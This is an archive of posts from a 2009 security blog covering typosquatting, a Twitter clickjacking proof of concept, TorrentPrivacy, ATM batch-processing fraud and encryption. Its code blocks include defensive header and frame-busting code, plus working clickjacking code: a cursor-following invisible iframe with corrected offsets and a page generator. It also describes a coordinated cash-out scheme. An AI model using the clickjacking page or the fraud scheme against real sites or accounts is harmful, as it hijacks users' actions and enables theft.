Thursday, February 26, 2009

Cyber-Squatters Suck


!Readers beware!


Thanks to RSnake for pointing this out to me...

Apparently some jerk cyber-squatted blogPspot.com ... notice the extra P in there. Now be careful if you're typing the address of this blog, otherwise you may end up on a page you didn't want to go to.

I hate cyber-squatters.

WHOIS Information
Registrant:
Navigation Catalyst Systems, Inc
2141 Rosecrans Ave.
Suite 2020
El Segundo, CA 90245
Email:
Phone: 3106471592
Fax: 3106476001

Domain Name: BLOGPSPOT.COM
This is my favorite part... Server Info:

IP Address: 208.87.149.250
IP Location: Bosnia And Herzegovina - Bosnia And Herzegovina - Constantin Servicos De Inf
Response Code: 200
Domain Status: Registered And Active Website

Stupid Wanks.
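Squatters pick names like blogpspot.com by enumerating the one-keystroke typos of a popular domain, and a brand owner can run the same enumeration first and check WHOIS for each result. The following is an added example, not code from the original post: it generates the omission, substitution, transposition and insertion variants of a domain label, and classifies which edit turns the real name into a candidate.

```javascript
// Added example (not from the original post): enumerate the one-keystroke typo
// variants of a domain label, the way squatters pick names like blogpspot.com
// (one extra 'p' in blogspot.com) and the way a brand owner can find them first.
const LETTERS = 'abcdefghijklmnopqrstuvwxyz';

function typoVariants(domain) {
  const dot = domain.indexOf('.');
  const label = domain.slice(0, dot);
  const suffix = domain.slice(dot);                 // ".com"
  const out = new Set();
  for (let i = 0; i < label.length; i++) {
    // omission: one character dropped
    out.add(label.slice(0, i) + label.slice(i + 1));
    // substitution: one character replaced
    for (const c of LETTERS) out.add(label.slice(0, i) + c + label.slice(i + 1));
    // transposition: two adjacent characters swapped
    if (i + 1 < label.length) {
      out.add(label.slice(0, i) + label[i + 1] + label[i] + label.slice(i + 2));
    }
  }
  // insertion: one extra character anywhere (covers doubled letters like blogpspot)
  for (let i = 0; i <= label.length; i++) {
    for (const c of LETTERS) out.add(label.slice(0, i) + c + label.slice(i));
  }
  out.delete(label);                                // substituting a letter by itself
  return [...out].map(l => l + suffix);
}

// true if `short` equals `long` with exactly one character removed
function isDeletionOf(long, short) {
  for (let i = 0; i < long.length; i++) {
    if (long.slice(0, i) + long.slice(i + 1) === short) return true;
  }
  return false;
}

// Name the single edit that turns `original` into `candidate`, or null if the
// candidate is not a one-keystroke typo of it (handy when triaging a WHOIS sweep).
function classifyTypo(original, candidate) {
  const oDot = original.indexOf('.'), cDot = candidate.indexOf('.');
  if (original.slice(oDot) !== candidate.slice(cDot)) return null;   // different TLD
  const a = original.slice(0, oDot), b = candidate.slice(0, cDot);
  if (a === b) return null;
  if (b.length === a.length + 1) return isDeletionOf(b, a) ? 'insertion' : null;
  if (a.length === b.length + 1) return isDeletionOf(a, b) ? 'omission' : null;
  if (a.length !== b.length) return null;
  const diff = [];
  for (let i = 0; i < a.length; i++) if (a[i] !== b[i]) diff.push(i);
  if (diff.length === 1) return 'substitution';
  if (diff.length === 2 && diff[1] === diff[0] + 1 &&
      a[diff[0]] === b[diff[1]] && a[diff[1]] === b[diff[0]]) return 'transposition';
  return null;
}
```

Feed the output of typoVariants() into whois one name at a time (with a delay; registrars rate-limit) and anything that comes back registered to someone other than you is a candidate squat.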

Wednesday, February 25, 2009

Latest ClickJacking Twitter Exploit vs. Browsers (IE, FireFox, NoScript)

Cool! Dan Goodin over at The Register picked this up too...

1:38pm - Update
- Interestingly enough, I finally took a peek at why this wasn't working; the original writer of the 'sploit didn't have the iFrame positioned so that Twitter's UPDATE button sat under the mouse cursor. Offsets of (x - 40) and (y - 120) work perfectly :)

----

ClickJacking has once again come to Twitter! <-- Proof-of-Concept link

You've heard IT security folks talk about it, you've wondered what it really means, and maybe you've even seen the WebCam example of ClickJacking; but you're not really sure what the big deal is, right?

ClickJacking is a pretty nasty attack, and what's worse, your browser may not really help you much against it (the UI redress attack, as it was originally called). The problem is that ClickJacking isn't a defect in any one browser; it abuses behaviour that HTML and CSS deliberately allow: a transparent, absolutely positioned iFrame still receives the clicks that land on it, so the browser is doing exactly what the standards say... whoops! That leaves the defence to the framed site, which has to refuse to be framed (frame-busting scripts, or the X-Frame-Options header that IE8 had just introduced), or to add-ons like NoScript's ClearClick.

Today Twitter was abuzz with the latest (the 2nd one by my count) ClickJacking exploit in as many weeks, and it was interesting to see. I wanted to point out some interesting things in this exploit, and show some of the things that make these types of attacks dangerous. As a side effect, I took some screen shots of this exploit (and one RSnake mocked up for me) in different browsers just to see how things looked.

The original noggin.com page only sets the iFrame to 50% opacity, meaning the iFrame stays half-visible, so it's not much of an exploit per se. RSnake's mock-up drops the opacity toward zero so the frame all but disappears, which makes it a good deal more dangerous... keep reading.

First, the noggin.com URL referenced above looks like this in Windows Vista/Service Pack 1/IE 7.0.6001.18000:

... you'll notice that it is essentially all white (strange how IE renders these), but some weird pop-up comes up asking you to save a file? Internet Explorer 7 obviously has some quirks here...

Next you can see what FireFox looks like on that same URL... naked (Vista/Service Pack 1 FireFox 3.0.6 with NoScript 1.9.0.6 (latest)):

See the difference? In IE all you saw was a white box around your cursor (that was the iFrame moving with your mouse), but in FireFox you'll notice that you see the actual iFrame displayed (still following your cursor diligently).

The reason the iFrame follows your cursor is this piece of code (comments are mine):
<script type="text/javascript">
// Re-position the near-transparent iframe on every mouse move so that the
// framed page's UPDATE button stays right under the victim's cursor.
function mouseFollower(e){
  // document.all only exists in IE; IE (before 9) exposes the cursor through
  // the global 'event' object, while other browsers pass it as the argument.
  x = (!document.all)? e.pageX : event.x+document.body.scrollLeft;
  y = (!document.all)? e.pageY : event.y+document.body.scrollTop;
  var iframe = document.getElementById('iframe');
  // These offsets decide which pixel of the framed page sits under the cursor.
  // As noted in the update above, (x - 30)/(y - 108) misses the button;
  // (x - 40)/(y - 120) lands on it.
  iframe.style.left = (x - 30) + 'px';
  iframe.style.top = (y - 108) + 'px';
}
document.onmousemove = mouseFollower;
</script>
Also, you'll notice if you look at the noggin.com page that the opacity isn't set very low, so the frame stays half visible:
iframe { position: absolute; width: 60px; height: 118px; z-index: 2; opacity: 0.5; filter: alpha(opacity=0.5); }
(The frame is cropped to 60x118 pixels, just big enough to hold the button. Note that IE's alpha filter expects a value from 0 to 100, so alpha(opacity=0.5) is not the IE equivalent of opacity: 0.5; alpha(opacity=50) would be.)
And of course, the page being framed is Twitter's mobile home page with the status text pre-filled through the query string, so the hijacked click on UPDATE posts the tweet:
<iframe id="iframe" src="http://m.twitter.com/home?status=I+have+a+tiny+face%2C+do+you%3F+http%3A%2F%2Ftinyurl.com%2Ftinyface" scrolling="no"></iframe>
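The geometry behind mouseFollower() generalises: the iframe's top-left corner has to sit at (cursor - button centre) so that the target control is always the thing being clicked. The following is an added example, not code from the original post or from the noggin.com page: frameOffset() does that arithmetic for an arbitrary target rectangle, and buildClickjackPage() emits an attacker page using the same absolutely positioned, near-transparent frame, with the cursor read through the standard pageX/pageY properties. The target URL, button box and frame size passed to it are assumptions for illustration; the post's own offsets of roughly 40/120 correspond to where the UPDATE button sits inside m.twitter.com's page.

```javascript
// Added example (not from the original post): the geometry behind mouseFollower().
// Coordinates are page pixels; `button` is the target control's box measured
// from the framed page's top-left corner.
function frameOffset(cursor, button) {
  return {
    left: Math.round(cursor.x - (button.left + button.width / 2)),
    top: Math.round(cursor.y - (button.top + button.height / 2)),
  };
}

// Build the attacker's page. targetUrl is the framed URL (in the post: Twitter's
// mobile home page with a pre-filled status), frame is the cropped iframe size,
// opacity 0 makes the frame invisible while it still receives the click.
function buildClickjackPage({ targetUrl, button, frame, opacity, bait }) {
  const cx = button.left + button.width / 2;     // button centre inside the frame
  const cy = button.top + button.height / 2;
  return `<!DOCTYPE html>
<html><head><style>
  #target { position: absolute; width: ${frame.width}px; height: ${frame.height}px;
            z-index: 2; border: 0; opacity: ${opacity};
            filter: alpha(opacity=${Math.round(opacity * 100)}); }
</style></head>
<body>
<p>${bait}</p>
<iframe id="target" src="${targetUrl}" scrolling="no"></iframe>
<script>
  // Same idea as mouseFollower(): keep the button's centre under the cursor.
  document.onmousemove = function (e) {
    var f = document.getElementById('target');
    f.style.left = (e.pageX - ${cx}) + 'px';
    f.style.top = (e.pageY - ${cy}) + 'px';
  };
</script>
</body></html>`;
}
```

The generated page is only useful against a target that allows itself to be framed, which is exactly the property the framed site has to remove.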
Now... let's look at RSnake's mock-up with opacity turned up... a lot.

Here is what Internet Explorer sees when the opacity is turned up:


Now the same page viewed in Firefox, with NoScript turned on... and you'll notice that you can barely see the iFrame this time (as it is now nearly transparent), but when you click... ta-da....



So fundamentally... IE is broken somehow, some way: not only does it paint a white box instead of the actual iFrame (unsure why... needs more looking), but the pop-up is perhaps due to something entirely unrelated to the clickjack attempt.


So... as a final thought - use FireFox + NoScript... save yourself from strange things that go bump on the 'net.
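NoScript protects one user; the fix that protects everyone has to come from the framed site, which in this case is Twitter. The following is an added example, not code from the original post or from Twitter: framingAllowed() is the decision a browser that understands the X-Frame-Options response header makes (DENY and SAMEORIGIN were its two original values; IE8 had just introduced the header when this was written and other browsers adopted it later), and protectResponse() shows what a framed site should send: the header for browsers that honour it, plus a frame-busting script for those that don't. The response object shape is an assumption for illustration.

```javascript
// Added example (not from the original post): the framed site's defences.

// How a browser that understands X-Frame-Options decides whether to render a
// response inside a frame. topOrigin is the origin of the outermost page,
// frameOrigin the origin of the framed response.
function framingAllowed(xfoHeader, topOrigin, frameOrigin) {
  if (!xfoHeader) return true;                  // no header: anyone may frame you (the 2009 default)
  const value = xfoHeader.trim().toUpperCase();
  if (value === 'DENY') return false;
  if (value === 'SAMEORIGIN') return topOrigin === frameOrigin;
  return true;                                  // unrecognised value: header is ignored
}

// Frame-busting for the framed page itself. The body is hidden by default and
// only revealed when the page is the top-level window. A bare
// `if (top != self) top.location = self.location` can be neutralised by an
// attacker page that blocks the navigation, so hiding first is the safer shape.
const FRAME_BUSTER =
  '<style id="fb">body{display:none !important}</style>' +
  '<script>if (self === top) { var s = document.getElementById("fb"); s.parentNode.removeChild(s); }' +
  ' else { top.location = self.location; }</script>';

// Assumed response shape: { status, headers, body }. Adds the header and injects
// the frame buster at the top of <head> so it runs before anything is painted.
function protectResponse(res) {
  const headers = { ...res.headers, 'X-Frame-Options': 'DENY' };
  const body = res.body.includes('<head>')
    ? res.body.replace('<head>', '<head>' + FRAME_BUSTER)
    : FRAME_BUSTER + res.body;
  return { ...res, headers, body };
}
```

Pages that legitimately need to be framed by the same site use SAMEORIGIN instead of DENY; a login or status-update page like the one framed here has no such need.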

CMS, URL *FAIL*

[Credit goes to Jeremiah Grossman for posting this up on twitter the other day...]

Some of us, those of us in IT Security, tend to look at the little things, for example the URL line when we browse around from site to site... and every once in a while we hit something like this:

http://www.house.gov/htbin/blog_inc?BLOG,tx14_paul,blog,999,All,Item%20not%20found,ID=090223_2687,TEMPLATE=postingdetail.shtml

There are just so many things wrong with this URL. First off, the Item%20not%20found part is interesting... "Item not found"?? That reads like an error-message string being passed in from the caller. How odd; I wonder what the parameters for this are, and whether it will take some nice system or SQL commands?

Now, of course, being a .gov site I know they're monitoring it closely for hacking, so I don't dare poke at this site, but it's hilarious. You can change the ID=xxxxxx_xxxx and, depending on how good your guesses are, you may get other articles (maybe ones not yet set to publish?). A predictable identifier exposed like that is an invitation to enumerate.

Anyway, you'd think the government would take security seriously, ... nevermind, I can't stop laughing.

Monday, February 23, 2009

BitTorrent goes stealth(BitTorrent + Privacy = TorrentPrivacy.com)

If you're worried about your ISP snooping on your BitTorrent downloads, or the RIAA or MPAA trying to sue you for that illegal movie/song download, there is apparently help. I've been doing a little research into this topic since I'm starting to become privacy-paranoid in my old age, and have found this little gem: https://torrentprivacy.com/.

I always do a little digging when I find something interesting so here are some interesting tidbits from their website and usability ...
  • TorrentPrivacy.com plays upon the fears of downloaders - they play up the "knock at the door" scenario and even readily post many of the current legal suits regarding music/movie downloading
  • Language like "Ensures no lawsuits against you" but doesn't actually have any assurance or insurance against law suits - either monetary or compensatory in any other way, that I could find
  • Claims to make BitTorrent 100% anonymous and safe
  • A group of developers from the Russian Federation runs this little endeavor
  • It costs money to join their BitTorrent "relay" network
  • They provide an automatically configured uTorrent client (package comes complete with ssh tunnel software + torrent client)
The way this software works is like this:
  1. You fire up the packaged "BitTorrentPrivacy Client"
  2. A local encrypted tunnel (netcat plus the bundled SSH tunnel software) opens a connection to a Europe-, America- or Canada-based server
  3. Netcat (nc) opens a listener on local port 2222 and redirects it into the tcp/22 (SSH) tunnel it created
  4. uTorrent connects to peers through port 2222, so its traffic gets forwarded down the pipe in encrypted form
They have some interesting quotes in their FAQ section...

Do you keep logs?
No, we just do not have them. We are not obliged by any law to keep logs and we have disabled logging for all our services. In addition, we disabled the disk caching wherever possible, and regularly run maintenance scripts to delete temporary data and compulsory cache files.
Why should I trust TorrentPrivacy?
We're the group of independent developers well known to you by several Bittorrent projects such as: Torrentreactor.Net, Fulldls.Com, Bushtorrent.Com, Nutorrent.com. You can be sure that we're on your side! We know Bittorrent well - and we're ready to solve the problems of your privacy.
That's fascinating, so I had to try it. As advertised, I can verify the tunnel connects to a server I pick, and I can grab a torrent (legal or otherwise) without showing my ISP that I'm downloading... except that they'll see a hugely active SSH connection to an extremely busy IP address.

What I find amusing is the assumption that your ISP won't notice you downloading torrents just because you're no longer connected to thousands of peers pulling torrent chunks. That just isn't true. All your ISP has to do is work out that there are 3 IP addresses (or clusters) for the TorrentPrivacy servers, then match up SSH + large, long-lived data streams to them, and bingo. The only thing your ISP won't be able to tell is what you're downloading, and in exchange you're trusting the relay operator's "no logs" claim instead... but for some people that's worth the cost.
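What that looks like from the ISP's side is a simple aggregation over flow records. The following is an added example, not code from the original post or from any ISP: it applies exactly the heuristic described above (long-lived, high-volume tcp/22 traffic from a subscriber to one of a handful of known relay addresses) to a constructed set of NetFlow-style records. The relay and subscriber addresses are hypothetical, drawn from the RFC 5737 documentation ranges, and the thresholds are assumptions.

```javascript
// Added example (not from the original post): what the ISP can see.
const RELAY_ADDRESSES = new Set(['203.0.113.10', '203.0.113.11', '203.0.113.12']); // hypothetical relays

// Constructed NetFlow-style records: { src, dst, dport, bytes, seconds }
const SAMPLE_FLOWS = [
  { src: '198.51.100.7',  dst: '203.0.113.10', dport: 22,  bytes: 4800000000, seconds: 7200 }, // tunnelled torrent
  { src: '198.51.100.7',  dst: '192.0.2.44',   dport: 443, bytes: 120000,     seconds: 3 },
  { src: '198.51.100.9',  dst: '203.0.113.11', dport: 22,  bytes: 2100000,    seconds: 900 },  // ordinary shell session
  { src: '198.51.100.9',  dst: '203.0.113.11', dport: 22,  bytes: 1500000,    seconds: 600 },
  { src: '198.51.100.21', dst: '192.0.2.80',   dport: 22,  bytes: 9000000000, seconds: 5000 }, // big, but not to a relay
  { src: '198.51.100.33', dst: '203.0.113.12', dport: 22,  bytes: 900000000,  seconds: 4000 },
  { src: '198.51.100.33', dst: '203.0.113.12', dport: 22,  bytes: 700000000,  seconds: 3500 },
];

// Aggregate, per subscriber, the SSH traffic sent to relay addresses and flag
// those whose totals look like a tunnelled download rather than a shell session.
function flagRelayTunnels(flows, relays, { minBytes = 500000000, minSeconds = 1800 } = {}) {
  const perSrc = new Map();
  for (const f of flows) {
    if (f.dport !== 22 || !relays.has(f.dst)) continue;
    const agg = perSrc.get(f.src) || { bytes: 0, seconds: 0, relays: new Set() };
    agg.bytes += f.bytes;
    agg.seconds += f.seconds;
    agg.relays.add(f.dst);
    perSrc.set(f.src, agg);
  }
  return [...perSrc]
    .filter(([, a]) => a.bytes >= minBytes && a.seconds >= minSeconds)
    .map(([src, a]) => ({ src, bytes: a.bytes, seconds: a.seconds, relays: [...a.relays] }))
    .sort((p, q) => q.bytes - p.bytes);
}
```

The same query works just as well for any VPN or relay whose endpoints are few and well known, which is the point: encryption hides the content, not the fact or the volume of the connection.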

I think I'll just stick to legal downloads, easier that way... and it doesn't cost me anything or risk legal action.

Sunday, February 22, 2009

Banking's Achilles Heel

There is a perfect storm raging...
  • non-real-time banking/credit systems
  • global, distributed cash-access networks
  • near-depression global economy
  • collapse of financial markets globally
  • hackers contributing to organized crime
... when you add all those together you get one ugly situation. The recent globally coordinated ATM fraud was only possible because ATM systems, in certain places, operate on a non-real-time, batch-processing schedule. Having spent many years in a banking/credit institution I can say confidently that there are still many systems which are non-real-time, and the problem is not going away tomorrow.

Have you ever taken money out at an ATM [automated teller machine] only to see it appear on your statement a few days, or maybe weeks later? What about making a debit card purchase that doesn't post to your account (or count against your balance) for days? How about purchasing something on your credit card that doesn't post against your account until the end of the next business day? Have you then wondered why these things happen?

The answer is this: banking and credit systems are still largely batch processes. They depend for the most part on an end-of-day job that takes the day's transactions and sends them to a processor to post. Sometimes, where the merchant is low-tier, these batches don't run for days, or as much as a week!

While on a road trip a year or so ago, we stopped at a mountain restaurant in South Carolina... had lunch and bought some gas at the fuel station across the parking lot. When I got home the next day I tried to reconcile my checking account's available cash against purchases, only to discover that the nearly $100 I had spent that afternoon hadn't made it to my account. In fact, that debit did not post to my account until 4 days later! This got me thinking...

No one will dispute that hacker activity around credit card numbers and financial fraud has skyrocketed, and is trending upward at an alarming rate. With the global financial crisis we can anticipate more losses and hack attempts in the world's financial and credit institutions. So why is this a bigger problem today than it was years ago?

The main reason is that financial systems like credit card processing are not real time; meaning, they do not instantly apply the money you credit/debit against your account. In fact, as my story illustrates, some of the less-developed areas within this ecosystem are very much laggards. (To be precise, the lag you see on your statement is in posting and settlement; the fraud window opens wherever authorization itself is checked against a stale balance or limit rather than a live one.) These systems aren't going away, either. With banks on the brink of being nationalized, there is very little chance that tomorrow we will all wake up to a financial system that has globally performed a rip-and-replace exercise on the technology underpinnings of the credit markets. In short, non-real-time batch processing of credit/debit is here to stay for the foreseeable future... and this presents a glaring problem.

Take a scenario where hackers break into a massive treasure trove of credit account data (such as they did at Heartland Payment Systems, recently) and then create cloned cards which can be used at ATMs to withdraw cash, or at POS systems to make small purchases, without raising any eyebrows. These criminals can then tap into a globalized organized crime network which takes the millions of compromised, cloned cards and strikes simultaneously to withdraw massive amounts of cash before any bank realizes what just happened. Massive, coordinated fraud efforts like these are being perpetrated all around the world, and they are very, very difficult to find and even more difficult to prevent.

The only answer to attacks of this nature is a full conversion to real-time financial systems within our banking industry. Given the anemic condition most of these banks are in, this is simply not a possibility. What makes it even more improbable is that a system like this would have to be cut over to in an all-or-nothing fashion. The bandage would have to be ripped off in one clean motion, otherwise the pieces not attached to the new network would systematically begin to fail. Global credit processing failure would lead to an even more serious catastrophic event... but that's neither here nor there.

So you see, the banking industry has only itself to blame for the fraud it's being subjected to right now. Hacking happens, and no matter how PCI Compliant you are, how much money you've invested in preventative technologies they will not stop the determined human attacker who could be sitting in your call center harvesting card data about your customers right now!

So the ultimate rip-off? Find an account with a sizeable balance, but not so big that it triggers special flags, and simultaneously withdraw a good chunk of it from different locations around the globe. By the time the various batch-oriented systems reconcile, the account is [ $WithdrawAmt x SizeOfMob ] overdrawn and the criminals have gotten away with it cleanly.
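The difference between the two authorization models in that paragraph is easiest to see in a small model. The following is an added example, not code from the original post or from any bank: authorizeRealTime() decrements one live balance per approval, authorizeBatch() approves each withdrawal against the balance as of the last posting run and only discovers the overdraft when the batch reconciles, and cashOut() runs the "SizeOfMob" scenario through both. Balances, amounts and the per-transaction limit are constructed values.

```javascript
// Added example (not from the original post): coordinated cash-out under real-time
// versus batch authorization. Amounts are in dollars; all values are constructed.

// Real-time issuer: every ATM asks the same live balance, so the account can be
// drained only once.
function authorizeRealTime(balance, withdrawals, perTxnLimit) {
  let live = balance;
  let approved = 0;
  for (const amt of withdrawals) {
    if (amt <= perTxnLimit && amt <= live) {
      live -= amt;
      approved++;
    }
  }
  return { approved, balanceAfter: live };
}

// Batch-style issuer: every ATM sees the balance from the last posting run, so
// each withdrawal looks affordable on its own; the damage shows up at end of day.
function authorizeBatch(balance, withdrawals, perTxnLimit) {
  const snapshot = balance;                       // stale balance every ATM sees
  let approved = 0;
  let posted = 0;
  for (const amt of withdrawals) {
    if (amt <= perTxnLimit && amt <= snapshot) {
      approved++;
      posted += amt;
    }
  }
  return { approved, balanceAfter: balance - posted };   // end-of-day posting
}

// The mob's scenario: sizeOfMob cloned cards, each withdrawing withdrawAmt at once,
// each amount kept under the limit that would trigger "special flags".
function cashOut(balance, withdrawAmt, sizeOfMob, perTxnLimit) {
  const attempts = Array(sizeOfMob).fill(withdrawAmt);
  return {
    realTime: authorizeRealTime(balance, attempts, perTxnLimit),
    batch: authorizeBatch(balance, attempts, perTxnLimit),
  };
}
```

With a $1,000 balance, ten cards and $200 per withdrawal, the real-time model approves five and stops at zero; the batch model approves all ten and the account ends the day $1,000 overdrawn, which is the [ $WithdrawAmt x SizeOfMob ] figure above minus the balance that was actually there.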

Will this Achilles heel ever be fixed for good? It has to be. But only time will tell when... and how painful that transition will be. As for me, I'm going to keep using the cash I've been hoarding in my mattress.

Friday, February 20, 2009

A Business Analyst's Guide to Encryption

First, let's make sure everyone understands the topic; WikiPedia defines encryption thus:
In cryptography, encryption is the process of transforming information (referred to as plaintext) using an algorithm (called cipher) to make it unreadable to anyone except those possessing special knowledge, usually referred to as a key.
Sounds pretty easy, right? Encryption is part of the practice of cryptography, defined like so:
Cryptography (or cryptology; from Greek κρυπτός, kryptos, "hidden, secret"; and γράφω, gráphō, "I write", or -λογία, -logia, respectively)[1] is the practice and study of hiding information
Broken down to its simplest, encryption is the process of hiding information: something humanly readable has an algorithm (a mutation of some kind) applied to it so that it is meaningless without the secret key, which is usually a string of characters. One of the earliest recorded ciphers is attributed to Julius Caesar, used when orders had to cross a battlefield and be unreadable to the enemy if intercepted. It involved taking the alphabet and shifting it a certain number of positions to the right or left. If the key was R3 (shift right by 3), the letter a became d, d became g, and so on... thus you could write khoor and it would be translated back to hello. But enough history.

Modern cryptography involves designing ciphers that cannot easily be cracked by a computer, so carefully analysed algorithms are used and tested against brute-force breakage. You've likely heard of the most common ones, namely DES, 3DES and AES. These are of varying strengths, meaning it takes varying amounts of computing power (ideally far more than could be mustered within the useful lifetime of the message) to recover the key and read the message. Strength is mostly a matter of key size: DES's 56-bit key was brute-forced publicly in the late 1990s and should not be used for anything new, while 3DES and AES are the ones you will see mandated.
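The shift cipher from the history paragraph and the brute-force test from this one fit in a few lines together. The following is an added example, not code from the original post: caesarShift() implements the R3-style shift (khoor back to hello), and bruteForceCaesar() tries all 26 keys and ranks the results with a tiny, assumed English word list. The point it makes is the one about key size: with 26 keys there is nothing to "crack", whereas AES-128 has 2^128 of them.

```javascript
// Added example (not from the original post): the Caesar shift and why it falls
// to brute force. Letters wrap around the alphabet; everything else is kept as is.
function caesarShift(text, key) {
  const k = ((key % 26) + 26) % 26;                   // normalise negative keys
  let out = '';
  for (const ch of text) {
    const code = ch.charCodeAt(0);
    if (code >= 97 && code <= 122) out += String.fromCharCode(97 + (code - 97 + k) % 26);      // a-z
    else if (code >= 65 && code <= 90) out += String.fromCharCode(65 + (code - 65 + k) % 26);  // A-Z
    else out += ch;                                   // digits, spaces, punctuation
  }
  return out;
}

function caesarDecrypt(ciphertext, key) {
  return caesarShift(ciphertext, -key);
}

// Assumed, deliberately tiny word list used to score candidate plaintexts.
const COMMON_WORDS = new Set(['the', 'and', 'to', 'of', 'a', 'in', 'is', 'we', 'you', 'hello', 'attack', 'at', 'dawn']);
function englishScore(text) {
  return text.toLowerCase().split(/[^a-z]+/).filter(w => COMMON_WORDS.has(w)).length;
}

// The whole attack: try every key, rank by how English the result looks.
function bruteForceCaesar(ciphertext) {
  const candidates = [];
  for (let key = 0; key < 26; key++) {
    const plaintext = caesarDecrypt(ciphertext, key);
    candidates.push({ key, plaintext, score: englishScore(plaintext) });
  }
  return candidates.sort((a, b) => b.score - a.score || a.key - b.key);
}
```

bruteForceCaesar(caesarShift('attack at dawn', 17))[0] comes back with key 17, which is the whole point: the key space is the strength, and 26 is not a key space.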

Now that you have a foundational understanding of cryptography, encryption and ciphers... let's address this all from a business angle. When you read regulations like the PCI DSS (Payment Card Industry Data Security Standard), or HIPAA, or countless other industry-specific regulations which specifically call out information protection, you will read about encryption. Encryption is typically mandated, but it is rarely defined properly for implementation in the business context.

To be clear, there are two cases when you, the business analyst or project manager, will need to care about encryption:
  • Data in motion - This involves data moving from one place to another, generally across systems. This data could be anything from PIN codes to IP addresses to anything you can think of... on the wire, in transit, between two (or more) points. The reason this distinction matters is that data in motion is the most common type of encryption in use on the Internet. You may already know it as SSL (Secure Sockets Layer), or its successor TLS. SSL is the most common way that encryption is presented to users of systems, and presented as a security measure to safeguard information travelling from point to point across untrusted networks.
  • Data at rest - Data at rest isn't moving. While this may sound obvious, it means that it is currently being stored by a single system, contained within that closed system without travelling outside it. This can be data on a USB key, a hard disk, or a CD-ROM. (Data sitting in memory while a program works on it is sometimes classed separately as data in use, and it is the hardest of the three to protect.) Data at rest doesn't risk interception while traversing a hostile segment, but it can walk out of the building with the storage medium, as in the case of a CD-ROM.
Now that you understand those 2 very distinct encryption situations... think about which one generally gets used the most, and how extensively. I'm willing to bet that when someone says encryption, the first thing you think of is SSL. SSL and that golden lock in the bottom-right corner of your browser immediately inspire trust that the information you're typing into your browser is secure.

WRONG.

All that means is that once you hit the submit button, the information (if encrypted properly) cannot easily be intercepted and understood if plucked off the wire. Think of the likelihood of someone getting in between the server you're connected to and yourself. Think of how difficult it would be to slip an intercept into that connection. Now think about your browser. Think about the browser you're typing your credit card into. Your precious information, as you type it, sits in that browser's memory in the clear, meaning anyone (or anything) on that machine can read it.

So let's say you're on your favorite web site, buying your favorite book or widget. You look for that golden lock and once you see it you assume you're safe. You then diligently enter all your credit card information, which your browser packages up and sends across the Internet. The sticking point is that SSL encrypts the tunnel the data passes through; it does not encrypt the data itself, which is plaintext again the moment it reaches the server at the other end.

As an analogy, imagine you're sending a package using FedEx (or whomever you like to ship with). Since you're shipping a letter that's super-secret you want it to be safe from prying eyes. If you were to use the physical equivalent of SSL encryption, you would put your letter in a metal box, put a lock on it, and both you and the partner receiving the package would have a key. You're assuming the carrier isn't going to pry open the box. But... ask yourself what if. What if that carrier pries open the box: your letter can now be read by anyone who wants to read it!

Now let's assume that rather than tackling that from a position of data in transit which you just did, you want to tackle the problem from a position of data at rest, meaning that you don't care if the letter is being moved or on your desk... you use a cipher to make sure that unless someone has the key they can't read it... even if they do pop open that lock while it's being transported.

Does this set off any alarms in the back of your mind? It should. Most businesses only tackle data security with the notion that data needs to be encrypted while it's travelling... but that obviously doesn't account for the endpoints. So what if the data is safe as it travels along the tunnel between your server and your partner's... what if your partner's server gets hacked and someone steals everything off it? You just had your information stolen! If the data had been encrypted at rest, you wouldn't care!

What I am hoping to instill in you is this: if the data you're safeguarding is encrypted at rest, then stealing the stored copy or the server it sits on gets the thief nothing useful. Using SSL on your web servers and leaving your databases completely unencrypted is not just irresponsible, but borderline negligent, given what you now know. All the SSL in the world won't protect your database (with precious customer data) should someone hit you with SQL Injection and pull the information straight out through your web application. Two caveats, though: at-rest encryption only helps in that scenario if the key lives with the application and not with the database (a "transparent" database-level encryption hands plaintext to any query, injected or not), and it does nothing for the data on the way in, which is plaintext until your server encrypts it, so you still need SSL on the wire.

So let's review... we have data at rest, and data in motion. Encryption in motion (SSL) protects the wire; encryption at rest protects the store. They address different attacks, and most businesses have only done the first... make sense?

ENCRYPT YOUR DATA AT REST
(in your databases, flat files, on disks... otherwise...)

Thursday, February 19, 2009

Got <3 for this Blog?

Do you <3 this blog? If the answer is yes, then go vote!

---> http://www.socialsecurityawards.com

I would love to get your vote...

Also, if you happen to read my other, HP-inspired blog Following the White Rabbit, you could nominate that one for the vendor-related blog...

kthxbye

:)

Wednesday, February 18, 2009

Surviving a Depressed Economic Situation...in security

The signs are everywhere; Wall Street has fallen into a deep recession, consumers aren't buying, houses aren't being built or sold, and criminals are breaching companies at an alarming rate. Today's economic reality, combined with the need to survive financially, has thrown gasoline on the hacking fire in recent weeks.

Whether you're looking at the intrusions and catastrophes at Heartland Payment Systems (HPS), SRA International, or the Wyndham Hotels - the writing is on the wall. Actually, it's no longer writing on the wall, it's a flashing neon sign over the freeway - "Criminals Are After You". It's only a matter of time before your web sites, applications and precious databases are infiltrated and bled dry for every drop of information.

The problems going on outside your corporate walls aren't any better internally. Insider fraud continues to mount in this type of depressed economy; just wait until someone in one of your call centers starts to skim credit cards and cardholder information... there is little you can do about it. The scary thing is that you, as the security leader, couldn't prevent this problem even if you had any money left in your budget. Criminal organizations (read: the mob) have figured out that sometimes, rather than employing expensive hackers, they can simply find an internal employee who's willing to be pushed over the edge for a payout and commit that next big insider crime. Let's face it, you have to trust at least *some* of your employees... right?

At least security companies are here to help you. At least anti-virus companies are there as your rock in hard times - oh, wait... they're not. BitDefender, Kaspersky, and Trend Micro join the expanding list of security companies that have been infiltrated lately. When will it all stop?

Now the Washington Post is reporting that GovTrip.com (the travel site for Federal employees) has been hacked as well to redirect visitors to a site that served up malware, how cute. There is no stopping the attackers, the criminals who are organizing at alarming rates. The FBI can't even track them let alone catch them anymore - there are simply too many, they're too organized, and they're too smart.

If you're the CISO, Security Manager, or whatever your security-related role in your business, you have to be looking at the news with your head in your hands. I know I am. Is it time to raise the white flag? There seems to be a perfect storm of sorts that has come to our doorstep looking for attention. The economic crisis has created a situation which, for us security folks, reads like a horror novel.

The contracting economy is breeding more criminal activity, while at the same time shrinking budgets. Combine those two together with the fact that there are more disgruntled employees than we've seen in a long, long time - and you get a situation that's nearly impossible to survive unscathed. Data breaches, hacks, and break-ins are being reported daily... but I'm going to offer you hope after tearing down your morale. Here it is...

